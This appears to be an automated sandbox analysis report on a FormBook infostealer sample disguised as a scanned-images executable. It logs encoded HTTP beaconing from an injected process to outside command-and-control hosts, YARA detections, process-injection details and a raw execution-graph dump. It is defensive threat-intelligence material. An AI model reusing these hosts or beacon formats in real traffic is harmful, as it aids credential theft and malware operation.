                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.rtrpodcast.online
                                                      Referer: http://www.rtrpodcast.online/l2ei/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=7PZJRSXxbWSlrFeJ2+r38oB+ZMKz7rvJBF8NcAJvYnozdGaoB8wxYSwGm0rTBT9ZNWLwUTiEBfCkL1d7ISke4JUND2oBGl5xstQ4zk8m99pnMg8CLbZU5SDQgMBY7wJIsGyEFYo4k5IyZt4P9BnaCJDn6ugBekVnuffNJFRzDhIBjHWUauR7jaO8YUzY/Iwbw8CIgJfsYGETxPE9rA==


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       39 | 192.168.2.9 | 54149 | 76.223.67.189 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:27:08.529903889 CEST | 1747 | OUT | POST /l2ei/ HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.rtrpodcast.online
                                                      Referer: http://www.rtrpodcast.online/l2ei/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                      40         | 192.168.2.9 | 54150       | 76.223.67.189  | 80               | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:27:11.067992926 CEST | 443               | OUT       | GET /l2ei/?dZo=2NxpSnefRSOpgA+Cw+nYyIA+NZzll6fiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINn5BMEGgIAwhvnt05vUIz6811FQIGXw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:27:11.524272919 CEST | 394               | IN        | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:27:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=2NxpSnefRSOpgA+Cw+nYyIA+NZzll6fiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINn5BMEGgIAwhvnt05vUIz6811FQIGXw==&gta=rzqXf4A02FEl_8"}</script></head></html>


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                      41         | 192.168.2.9 | 54151       | 116.213.43.190 | 80               | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:27:25.135858059 CEST | 692               | OUT       | POST /jda9/ HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.mqmsqkw.lol
                                                      Referer: http://www.mqmsqkw.lol/jda9/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=66EHT97zYqu5f0IWh71CQ9Ve8EjaIbfroPP8ANXNsw8r36m8iAslc0tbYTfPaA4v/R/JTVrFLvYu5I2c2e1Jc+HbuHwAIgj+6dzkUovpaHuOif7gx2xYnk7qNEr99FJBpRX4T9jsU/XXPPVk3vGPqsbPWLDp8jcHZ8pSKhjzvSP6TnHYQcaJ0hUNQRZe


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                      42         | 192.168.2.9 | 54152       | 116.213.43.190 | 80               | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:27:27.675473928 CEST | 716               | OUT       | POST /jda9/ HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.mqmsqkw.lol
                                                      Referer: http://www.mqmsqkw.lol/jda9/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=66EHT97zYqu5eV4WjcJCVdVdzkjaGLfVoOz8AJHdtCor3Y+8jCUlRUtbfjfKUg4a/R7vTQDFLvMu5JGc2tdGduHV13weGAj+6dzkUoq+aH2OivrgyXxbuE6YEkr95FJFpRWvT8+5U9fXPOFk3+GIgsbBYrCj7Q9CB719VC/IuhfBUGnGBuTSh2UqX2Q2lEBRTkh1yCE+nLtvlnTkJw==


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                      43         | 192.168.2.9 | 54153       | 116.213.43.190 | 80               | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:27:30.222593069 CEST | 1729              | OUT       | POST /jda9/ HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.mqmsqkw.lol
                                                      Referer: http://www.mqmsqkw.lol/jda9/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=66EHT97zYqu5eV4WjcJCVdVdzkjaGLfVoOz8AJHdtCwr3L28hl4lQUtbcjfLUg4H/RDjTQGwLt0u7vyc/8dGTuHVqHwfIgjR6djgUo6+aH2Oitjgk2xbik7qNErh9FJ9pVC/T86pVN/XBP1k7s+IosanbrD27QxJB/VAVBjiuhXBXhGlWKPwglVad0kttwBpR0F0uzVe8aJ5vS7tWNIDVhd6usU3one08vKE6oh7e9iYKPu+C65mVujWOG8Y4TsgrNpKhEfTWLJBndWn6vD8h6Tq/9AH6ayzy7ezwAdnwMyAEwNgcNHqRQh+P7iy8bOCw5X4U9kORk9yHok3pXadEYti0irnc24LNW9dR1oN8KtX2vYvta6fO0SBRc2OIZ3S/yDeiS6DwWGc3RBq1Ap2zy5L5bCU0gYejr+6XMB0Mv2dL0uiyPJ6FjdMpVKGvwbuVEuVWw3HV6/JUyYjGvWEMqNHm+a6lReotS2l5uzrmRxTBMI3d5DErQr2Ojg/nix5/lU8ioGSbg8G6PpF6do+xteYwBXuXqsGvS20mH4CdrxbA1k86ge8jsnMBAm0EZPHyl/uZ/74or5pTBNIJ9bZ0ZQdZHVCUg/y+MJYmOmN3xRukbw/b+uozNaGd00SWe96CszZLRFr9cGMJOT2xFqDgcLW00zyOqdAhNUYshReD6wtBmeXTAw1RNzZmu+o5Z04YrHsWj9JVYQEzEQZuTKin38WAIH3/377jG6b2LaWIazeH3IfJw+DSt2tb/y4XDd6ylcyVEwIjIUZ4FGWZL/1ZEM9FGnJFTtdYBIi5ipSWHyKQQlj3z3cGKUu4ffu4Up4MnbQkxC2hqrEynMw5bMOhtC3pFtsZSuitijrNKsLWHXv4m4ltI9eGCwIIDUkJV9H+5mZ6gPIJLZ+qPghQjhqTYjP39KY2T3fcqjZ8YF2m2bhFyH+aGmNKjPBXEx5wgtH2q5GEElcsQdeLN1lNdirVlRPPFi83p5giejqkhIxivX1MiXk [TRUNCATED]


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                      44         | 192.168.2.9 | 54154       | 116.213.43.190 | 80               | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:27:32.762904882 CEST | 437               | OUT       | GET /jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                      45         | 192.168.2.9 | 54155       | 116.213.43.190 | 80               | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:27:59.680413008 CEST | 692               | OUT       | POST /yxos/ HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lfghtko.lol
                                                      Referer: http://www.lfghtko.lol/yxos/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=LugYlboQcaRDicaEtGyYm1ma5sySS3AsUz866kKddNeEwZXpWXCIPHP1nXQ5cI88yveVwGDIxpelhev5ui5U4blQuBEpnYXSfGrSCjo+77OrFnY1IUuFZXxDqykkP5bIgIjNXKzmC6NV5ncJMsWhMmVmynri7XdLD3i9ZdwQ/eyYYn1AJvQZQvHwYbW6


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                      46         | 192.168.2.9 | 54156       | 116.213.43.190 | 80               | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:28:02.324917078 CEST | 716               | OUT       | POST /yxos/ HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lfghtko.lol
                                                      Referer: http://www.lfghtko.lol/yxos/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=LugYlboQcaRDj9KEiHyYu1md8sySbXASUzg66kizd/6Ew5npXWCIIHP1v3Q4D48nyvSswH/Ixo6lhcn5tRRT6LlO7REr4IXSfGrSCnJj74+rFWo1O1uEHHxEtykkL5bTgIjvXIXMC41V5msJL++uGmVs9HqO72MsE3qcY7Rwlt+ofGVeYdZCF4HXf8fSezRPYUI9Hdn1mauuzbSlrQ==


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                                      47         | 192.168.2.9 | 54157       | 116.213.43.190 | 80
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:28:06.481605053 CEST | 1729              | OUT       | POST /yxos/ HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lfghtko.lol
                                                      Referer: http://www.lfghtko.lol/yxos/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port
                                                      48         | 192.168.2.9 | 54158       | 116.213.43.190 | 80
                                                      Timestamp                            | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:28:09.012103081 CEST | 437               | OUT       | GET /yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                      Target ID:0
                                                      Start time:12:23:56
                                                      Start date:18/08/2024
                                                      Path:C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
                                                      Imagebase:0xa20000
                                                      File size:1'211'904 bytes
                                                      MD5 hash:58077F7B69CA6E33EC9A13F1B2B53C02
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:12:23:57
                                                      Start date:18/08/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
                                                      Imagebase:0x60000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:12:24:18
                                                      Start date:18/08/2024
                                                      Path:C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe"
                                                      Imagebase:0x460000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:12:24:20
                                                      Start date:18/08/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                      Imagebase:0x330000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:12:24:33
                                                      Start date:18/08/2024
                                                      Path:C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe"
                                                      Imagebase:0x460000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:12
                                                      Start time:12:24:45
                                                      Start date:18/08/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff73feb0000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:3.7%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:5.1%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:164
100088->100134 100089 a30fbf TranslateMessage DispatchMessageW 100089->100088 100090 a30e73 timeGetTime 100090->100134 100091 a65c49 WaitForSingleObject 100093 a65c66 GetExitCodeProcess CloseHandle 100091->100093 100091->100134 100128 a310f5 100093->100128 100094 a30fdd Sleep 100127 a30fee Mailbox 100094->100127 100095 a281a7 59 API calls 100095->100134 100096 a277c7 59 API calls 100096->100127 100097 a40ff6 59 API calls Mailbox 100097->100134 100098 a65f22 Sleep 100098->100127 100101 a40719 timeGetTime 100101->100127 100102 a310ae timeGetTime 101356 a29fbd 60 API calls 100102->101356 100105 a29997 84 API calls 100105->100134 100106 a65fb9 GetExitCodeProcess 100111 a65fe5 CloseHandle 100106->100111 100112 a65fcf WaitForSingleObject 100106->100112 100109 aa61ac 110 API calls 100109->100127 100110 a2b93d 109 API calls 100110->100127 100111->100127 100112->100111 100112->100134 100113 a29fbd 60 API calls 100113->100134 100114 a65c9e 100114->100128 100115 a66041 Sleep 100115->100134 100116 a654a2 Sleep 100116->100134 100118 a27f41 59 API calls 100118->100127 100123 a2a000 314 API calls 100123->100134 100127->100096 100127->100101 100127->100106 100127->100109 100127->100110 100127->100114 100127->100115 100127->100116 100127->100118 100127->100128 100127->100134 101366 a828f7 60 API calls 100127->101366 101367 a29fbd 60 API calls 100127->101367 101368 a28b13 69 API calls Mailbox 100127->101368 101369 a2b89c 341 API calls 100127->101369 101370 a76a50 60 API calls 100127->101370 101371 a854e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100127->101371 101372 a83e91 66 API calls Mailbox 100127->101372 100128->99929 100131 a8a0b5 89 API calls 100131->100134 100132 a29df0 59 API calls Mailbox 100132->100134 100133 a2b89c 314 API calls 100133->100134 100134->100075 100134->100080 100134->100082 100134->100087 100134->100088 100134->100089 100134->100090 100134->100091 100134->100094 100134->100095 100134->100097 100134->100098 
100134->100102 100134->100105 100134->100113 100134->100123 100134->100127 100134->100128 100134->100131 100134->100132 100134->100133 100136 a28620 69 API calls 100134->100136 100137 a766f4 59 API calls Mailbox 100134->100137 100138 a659ff VariantClear 100134->100138 100139 a77405 59 API calls 100134->100139 100140 a65a95 VariantClear 100134->100140 100141 a65843 VariantClear 100134->100141 100142 a28e34 59 API calls Mailbox 100134->100142 100143 a27f41 59 API calls 100134->100143 100144 a28b13 69 API calls 100134->100144 101294 a2e580 100134->101294 101301 a2e800 100134->101301 101332 a2f5c0 100134->101332 101352 a2fe40 341 API calls 2 library calls 100134->101352 101353 a231ce IsDialogMessageW GetClassLongW 100134->101353 101360 aa629f 59 API calls 100134->101360 101361 a89c9f 59 API calls Mailbox 100134->101361 101362 a7d9e3 59 API calls 100134->101362 101363 a76665 59 API calls 2 library calls 100134->101363 101364 a28561 59 API calls 100134->101364 101365 a2843f 59 API calls Mailbox 100134->101365 100136->100134 100137->100134 100138->100134 100139->100134 100140->100134 100141->100134 100142->100134 100143->100134 100144->100134 100145->99931 100146->99906 100147->99918 100149 a51b90 __write_nolock 100148->100149 100150 a24871 GetModuleFileNameW 100149->100150 100151 a27f41 59 API calls 100150->100151 100152 a24897 100151->100152 100153 a248ae 60 API calls 100152->100153 100154 a248a1 Mailbox 100153->100154 100154->99925 100156 a23d50 __write_nolock 100155->100156 100157 a27d2c 59 API calls 100156->100157 100162 a23eb6 Mailbox 100156->100162 100159 a23d82 100157->100159 100168 a23db8 Mailbox 100159->100168 100262 a27b52 100159->100262 100160 a27b52 59 API calls 100160->100168 100161 a23e89 100161->100162 100163 a27f41 59 API calls 100161->100163 100162->99951 100165 a23eaa 100163->100165 100164 a27f41 59 API calls 100164->100168 100166 a23f84 59 API calls 100165->100166 100166->100162 100168->100160 100168->100161 100168->100162 100168->100164 100265 a23f84 
100168->100265 100271 a24d13 100169->100271 100174 a5dd0f 100177 a24faa 84 API calls 100174->100177 100175 a24f68 LoadLibraryExW 100281 a24cc8 100175->100281 100179 a5dd16 100177->100179 100180 a24cc8 3 API calls 100179->100180 100182 a5dd1e 100180->100182 100307 a2506b 100182->100307 100183 a24f8f 100183->100182 100184 a24f9b 100183->100184 100186 a24faa 84 API calls 100184->100186 100188 a237e6 100186->100188 100188->99958 100188->99959 100190 a5dd45 100315 a25027 100190->100315 100192 a5dd52 100194 a40ff6 Mailbox 59 API calls 100193->100194 100195 a2380d 100194->100195 100195->99972 100197 a23f05 100196->100197 100198 a23eec 100196->100198 100199 a27d2c 59 API calls 100197->100199 100200 a281a7 59 API calls 100198->100200 100201 a2388b 100199->100201 100200->100201 100202 a4313d 100201->100202 100203 a431be 100202->100203 100204 a43149 100202->100204 100747 a431d0 60 API calls 4 library calls 100203->100747 100211 a4316e 100204->100211 100745 a48d68 58 API calls __getptd_noexit 100204->100745 100207 a431cb 100207->99997 100208 a43155 100746 a48ff6 9 API calls __read_nolock 100208->100746 100210 a43160 100210->99997 100211->99997 100213 a5f5a5 100212->100213 100219 a29057 100212->100219 100213->100219 100749 a28d3b 59 API calls Mailbox 100213->100749 100215 a291a0 100748 a29e9c 60 API calls Mailbox 100215->100748 100216 a29158 100217 a40ff6 Mailbox 59 API calls 100216->100217 100220 a2915f 100217->100220 100219->100215 100219->100216 100219->100220 100220->100024 100222 a25045 85 API calls 100221->100222 100223 a89854 100222->100223 100750 a899be 100223->100750 100226 a2506b 74 API calls 100227 a89881 100226->100227 100228 a2506b 74 API calls 100227->100228 100229 a89891 100228->100229 100230 a2506b 74 API calls 100229->100230 100231 a898ac 100230->100231 100232 a2506b 74 API calls 100231->100232 100233 a898c7 100232->100233 100234 a25045 85 API calls 100233->100234 100235 a898de 100234->100235 100236 a4594c __crtCompareStringA_stat 58 API calls 100235->100236 
100237 a898e5 100236->100237 100238 a4594c __crtCompareStringA_stat 58 API calls 100237->100238 100239 a898ef 100238->100239 100240 a2506b 74 API calls 100239->100240 100241 a89903 100240->100241 100242 a89393 GetSystemTimeAsFileTime 100241->100242 100243 a89916 100242->100243 100244 a8992b 100243->100244 100245 a89940 100243->100245 100246 a42f95 _free 58 API calls 100244->100246 100247 a899a5 100245->100247 100248 a89946 100245->100248 100249 a89931 100246->100249 100251 a42f95 _free 58 API calls 100247->100251 100756 a88d90 100248->100756 100252 a42f95 _free 58 API calls 100249->100252 100255 a5d3c1 100251->100255 100252->100255 100254 a42f95 _free 58 API calls 100254->100255 100255->99963 100256 a24faa 100255->100256 100257 a24fb4 100256->100257 100258 a24fbb 100256->100258 100259 a455d6 __fcloseall 83 API calls 100257->100259 100260 a24fca 100258->100260 100261 a24fdb FreeLibrary 100258->100261 100259->100258 100260->99963 100261->100260 100263 a27faf 59 API calls 100262->100263 100264 a27b5d 100263->100264 100264->100159 100266 a23f92 100265->100266 100270 a23fb4 _memmove 100265->100270 100269 a40ff6 Mailbox 59 API calls 100266->100269 100267 a40ff6 Mailbox 59 API calls 100268 a23fc8 100267->100268 100268->100168 100269->100270 100270->100267 100320 a24d61 100271->100320 100274 a24d3a 100276 a24d53 100274->100276 100277 a24d4a FreeLibrary 100274->100277 100275 a24d61 2 API calls 100275->100274 100278 a4548b 100276->100278 100277->100276 100324 a454a0 100278->100324 100280 a24f5c 100280->100174 100280->100175 100482 a24d94 100281->100482 100284 a24ced 100286 a24d08 100284->100286 100287 a24cff FreeLibrary 100284->100287 100285 a24d94 2 API calls 100285->100284 100288 a24dd0 100286->100288 100287->100286 100289 